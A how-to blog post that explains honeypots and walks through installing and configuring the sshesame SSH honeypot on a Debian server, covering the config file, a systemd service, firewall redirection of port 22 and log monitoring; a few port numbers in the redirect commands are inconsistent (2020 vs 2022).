1. Home
    2. »
  2. How To
    3. » Set up a SSH honeypot with logging on your linux server

Set up a SSH honeypot with logging on your linux server

- Posted in How To by - Permalink

Setting up a honeypot on your server can be an effective way to monitor, log, and analyze potential attacks, as well as learn about common hacking techniques. By setting up a honeypot, you can create a bait system that attracts attackers, tracks their activities, and provides valuable insights into their methods—all without compromising your real systems. In this guide, we’ll configure a simple SSH honeypot on a Debian server using sshesame, a lightweight tool that emulates an SSH service and captures login attempts.

What is a Honeypot?

A honeypot is a decoy system designed to look like a legitimate target to potential attackers. Its main purpose is to attract, log, and analyze unauthorized access attempts. Honeypots can be set up externally, to observe common attack patterns in the wild, or within a secure network, to trigger alerts if an attacker breaches the internal network. Think of it as a “bait server” that logs everything a hacker tries to do, without actually giving them access to sensitive information.

Honeypots can track various actions, like attempted SSH logins, fake HTTP requests, or even interaction with a simulated database. The exact behavior depends on the type of honeypot you deploy:

  • Service-level honeypots: Simulate a single service (e.g., SSH or HTTP) and log interactions with that service.
  • High-interaction honeypots: Emulate a full OS with several services, providing more detailed information on attacker behavior

In this guide, I’ll focus on an SSH honeypot using sshesame, which logs SSH connection attempts and can reveal usernames, passwords, and techniques used by attackers.

Pick Your Honeypot Software

Before diving into sshesame, know that there are many different honeypot solutions available. Here are some factors to consider when choosing honeypot software:

  • Complexity: Do you want a simple service honeypot or a fully interactive one?
  • Types of Services: Are you only interested in SSH, or do you want to simulate other services like HTTP, FTP, etc.?
  • Logging Capabilities: How much detail do you want in logs?
  • Resources: Consider CPU, memory, and network bandwidth—some honeypots can be resource-intensive; especially high-interaction honeypots

If you’re interested in exploring other honeypots, check out awesome-honeypots for an extensive list of free open-source solutions.

Install sshesame

While sshesame is available in the Debian package repositories, it’s often outdated. To ensure you have the latest version, I would recommend downloading the binary or using Docker.

At the time of writing, the latest version is v0.0.39, so we’ll use that for this setup. Their will probably be a newer version out when you are reading this, so you will need to adjust the commands just slightly.

Download the latest binary:

wget https://github.com/jaksi/sshesame/releases/download/v0.0.39/sshesame-linux-amd64
wget https://github.com/jaksi/sshesame/releases/download/v0.0.39/sshesame.yaml

Make the binary executable:

chmod +x sshesame-linux-amd64

Move files to the correct directories:

mkdir /var/log/sshesame
touch /var/log/sshesame/sshd-honeypot.log
mv sshesame-linux-amd64 /usr/local/bin/sshesame-linux-amd64
mv sshesame.yaml /usr/local/etc/sshesame.yaml

Now let’s configure sshesame by editing its configuration file. Open the sshesame.yaml file and adjust the settings to your needs.

nano /usr/local/etc/sshesame.yaml

Set Up Your Honeypot: Here’s a recommended configuration to make sshesame look appealing to attackers while ensuring logs are comprehensive:

server:
  listen_address: 0.0.0.0:2020

  # Fake internal services for handling direct-tcpip channels (`ssh -L`).
  tcpip_services:
    25: SMTP
    80: HTTP
    110: POP3
    587: SMTP
    8080: HTTP

logging:
  file: /var/log/sshesame/sshd-honeypot.log

  # Make activity logs JSON-formatted instead of human readable.
  json: true

  # Include timestamps in the logs.
  timestamps: true

auth:
  # Allow clients to connect without authenticating.
  no_auth: false

  password_auth:
    # Offer password authentication as an authentication option.
    enabled: true
    # Accept all passwords.
    accepted: true

  public_key_auth:
    # Offer public key authentication as an authentication option.
    enabled: true
    # Accept all public keys.
    accepted: false

ssh_proto:
  # The version identification string to announce in the public handshake.
  version: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
  # Remove the SSH Banner (don't display that it is a honepot)
  banner:

Since we want to let the service run permanently and not just when we have our terminal open, we will need to create a systemd service:

nano /etc/systemd/system/sshesame.service

Add the following configuration:

[Unit]
Description=SSH honeypot
After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/usr/local/bin/sshesame-linux-amd64 -config /usr/local/etc/sshesame.yaml 
Restart=always
MemoryMax=128M
MemoryHigh=64M
MemorySwapMax=0
CPUWeight=20
CPUQuota=20%
IOWeight=20

[Install]
WantedBy=multi-user.target

Enable and Start the Service:

systemctl enable sshesame.service
systemctl start sshesame.service
systemctl status sshesame.service

If everything is set up correctly, sshesame will now automatically start on boot and run in the background.

Configure the Firewall

You can only configure to run a honeypot on the default port if you have moved the real ssh service to another port!

When trying to connect to the honepot you will see that it currently doesn't work yet since we didn't touch our firewall yet. To expose the honeypot on the standard SSH port (22), you’ll need to redirect traffic:

For IPtables:

iptables -A PREROUTING -t nat -p tcp --dport 22 -j REDIRECT --to-port 2022

For UFW: Add a rule in /etc/ufw/before.rules before the *filter:

*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2020
COMMIT

Then enable UFW rules:

ufw allow 2022/tcp
ufw reload

Happy Logging

With sshesame running, your server is ready to attract and log SSH login attempts. To monitor the logs, you can check the log file we set up earlier:

tail -f /var/log/sshesame/sshd-honeypot.log

This will display live entries as they’re logged, giving you real-time insight into potential attack attempts. You’ll be able to see usernames, passwords, and IP addresses of anyone who tries to connect to your honeypot. If you notice patterns, such as repeated attacks from the same IP, you can use this information to strengthen your real systems.

Since you log everything in a json format you can also use tools such as jq to further process your logs.

Tags:

Related posts

« »